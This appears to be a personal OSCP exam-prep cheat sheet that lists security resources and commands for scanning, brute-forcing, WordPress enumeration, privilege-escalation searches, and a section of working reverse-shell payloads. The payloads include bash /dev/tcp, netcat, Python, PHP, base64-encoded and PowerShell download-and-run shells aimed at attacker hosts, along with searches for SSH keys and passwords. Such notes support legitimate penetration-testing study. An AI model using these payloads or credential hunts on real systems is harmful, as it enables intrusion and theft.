Useful Websites

offical exam guide
offical exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP juice box: OWASP security trainings
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[google gruyeye]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool rule_based_attack
feroxbuster: powerful forced browsing tool (gobuster、dirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explain command-line
SecLists: It's a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis.
Microsoft Security Response Center
exploit-notes.hdks.org
cvexploits.io: CVExploits Search
portswigger.net/web-security: Learn various web security techniques.
offsec.tools: A vast collection of security tools for bug bounty, pentest and red teaming.
LOLBAS: Living Off The Land Binaries, Scripts and Libraries
CAPEC: Common Attack Pattern Enumerations and Classifications
Burp Suite: Burp Suite Certified Practitioner Exam Study
BloodyAD: An Active Directory Privilege Escalation Framework
NetExec: The Network Execution Tool (CrackMapExec)
MITRE ATT&CK: ATT&CK Matrix for Enterprise
jadx: Dex to Java decompiler
nuclei: Community Powered Vulnerability Scanner, nuclei templates
Tilix: Tilix is a terminal emulator for Linux systems. It provides features such as support for split terminals, custom layouts, and a Quake-style drop-down mode.
API Penetration Testing: Mindmaps, tips & tricks, resources
Assetnote Wordlists
HackingHub: A new platform is established to offer guidance on enhancing hacking skills in real-world scenarios.

⚠️ Exam Restrictions

linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide

⚠️ Exam Change

📅 2022/1/11 Active Directory

📅 2022/8/6 OSCP Bonus Points Update

📅 2023/3/15 PEN-200 (PWK): Updated for 2023

• FAQ
• The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam. After the new material has been available for six months, any content included in the new version of PWK will be eligible for inclusion on the exam.
  

📅 2024/11/1 Changes to the OSCP

• OSCP+ 😐
  • Enhancements to the Active Directory portion of the exam
  • Removal of bonus points
    • What are the changes to exam format?
    • How will points be allocated / distributed?

🛠️ Commands

📂 hydra

Make sure there are no maximum number of login attempts. To perform a manual check.

IMAP

hydra -L <usernameList> -P <passwordList> -s 143 -f <target ip> imap
# -f exit when a login/pass pair is found
# -s target port

PostgreSQL

hydra -l <username> -P <passwordList> <target ip> postgres

for normal connection

psql -U <username> -p 5432 -h <hostname or ip>

HTTP Basic Authentication

hydra -l admin -P <passwordList> -s 80 -f <target ip> http-get /
# (/):default 

JSON

# Content-Type、Accept、Origin、X-Requested-With、Referer and CSRF checks、Cookies
# use cURL to check necessary headers
hydra -l admin -P <passwordList> <target ip> https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"

📂 cewl

get a list for password crackers

cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers --lowercase
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
# --help

📂 nmap

Timing Templates

Host Discovery

scan a subnet

# Note that if set too fast may affect the results
nmap -T3 192.168.10.0/24

scan all TCP ports and services

nmap -Pn -p- -sC -sV -T4 <target ip>

optimizing performance

nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second

# and then specific port
nmap -p <target port> -sC -sV <target ip>

# UDP
nmap -p- --min-rate 1000 -sU <target ip>

📂 reverse shell

ncat

ncat -e /bin/bash <attacker ip> <attacker port>

python3(file)

#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
run(["/bin/bash","-i"])

python(file)

#!/usr/bin/env python
import os
import sys
try: 
        os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'") 
except: 
        print 'ERROR...' 
sys.exit(0) 

When using the exploit file to pass command parameters fails

python

command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"

java

String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" }; 
Runtime.getRuntime().exec(cmdline);

php(file)

<?php system(\"nc -e /bin/bash <attacker ip> <attacker port>\"); ?>

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>

special cases 1

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f

special cases 2

# rev.sh
# sh -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1
curl http://<attacker ip>/rev.sh -o /tmp/rev.sh
bash /tmp/rev.sh

base64

echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash 
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash      

Windows cmd

REM https://www.revshells.com/ Powershell#3(Base64)
PowerShell.exe -command "powershell -e <base64 command string>"

📂 Cron jobs

crontab -l

ls -alh /etc/cron.* /etc/at*

cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

unprivileged Linux process snooping: pspy

📂 WordPress

WPScan

Finding application

wpscan --url http://192.168.0.1/ --random-user-agent

Enumerating valid usernames

wpscan --url http://192.168.0.1/ --enumerate u1-1000 --random-user-agent

Enumerating themes

wpscan --url http://192.168.0.1/ -e at --random-user-agent

curl -k -s http://192.168.0.1/wp-content/themes/ | html2text

curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Enumerating plugins

wpscan --url http://192.168.0.1/ -e ap --random-user-agent

wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose --random-user-agent
# --api-token:display vulnerability data (not always necessary), register a uesr and get the api key from wpscan offical website

curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text

curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Brute-force attack

wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin --random-user-agent

SSL peer certificate or SSH remote key was not valid

wpscan --url https://192.168.0.1/ --disable-tls-checks --random-user-agent

📂 LFI

LFI Suite

file in Windows

C:\Windows\System32\drivers\etc\hosts

📂 AutoRecon

git clone https://github.com/Tib3rius/AutoRecon.git

cd AutoRecon

sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results

📂 Wfuzz

find subdomains

wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# hw:hide responses words

need to authenticate

# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>

post requests

wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d postdata
# -z file,wordlist
# hc:hide responses code

📂 hashcat

create new password list

echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline

hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt

MD5

REM Try using m=0
 .\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt

🖥️ Linux

Typical site folders

/srv/http/
/var/www/html/

avoid permission denied messages

find / -name *kali* 2>&-

Writable file

find / -writable -type f 2>/dev/null | grep -v "/proc/"

find files containing specific text

find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-

grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .

# -a: Treat binary files as text files.
# -r: Recursively search subdirectories.
# -i: Perform a case-insensitive search.
# -n: Display line numbers along with the matched lines.
# -o: Only display the part of the line that matches the pattern.
# -E: Interpret the pattern as an extended regular expression.
# '(\w+\W+){0,5}password(\W+\w+){0,5}' 
# (\w+\W+){0,5}: This part matches zero to five occurrences of a word character followed by a non-word character (basically, any characters) before the actual word "password."
# (\W+\w+){0,5}: This part matches zero to five occurrences of a non-word character followed by a word character after the word "password."

finding SUID executables

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

find ssh key

find / -type f -name id_rsa* 2>&-

group capabilities

id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null

locate and execute the file

find / -name "*.log" 2>/dev/null -exec cat {} \; 

upgrade reverse shell in Kali

# 1.switch to bash
bash
nc -nlvp <local port>
# 2
/usr/bin/script -qc /bin/bash /dev/null
# 3
script -c "/bin/bash -i" /dev/null

# chsh - change your login shell
chsh /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1.finding current shell
echo $0
# 2.finding current shell 
/proc/self/exe --version

🖥️ Windows

icacls: Performs the operation on all specified files in the current directory and its subdirectories.

icacls <directory> /t

Remarks

A sequence of simple rights:

F - Full access

M - Modify access

RX - Read and execute access

R - Read-only access

W - Write-only access

download file

certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"

get file hash

certutil -hashfile <file> MD5

find files containing specific text

findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf

📂 PowerShell

bypass

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1

zip

Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist

unzip

Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop

reverse shell

powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"

find specific files

Get-ChildItem -Path "C:\Folder" -Recurse -Force -Filter "*.txt"
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Include "*.txt","*.zip","*.conf"

📂 Firefox

disable search in address bar function, easier to test

type in searchBar "about:config"
Accept warning
Search "keyword.enabled" and change it to false

modify header tool (or Burp Suite)

https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/

📂 others

C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts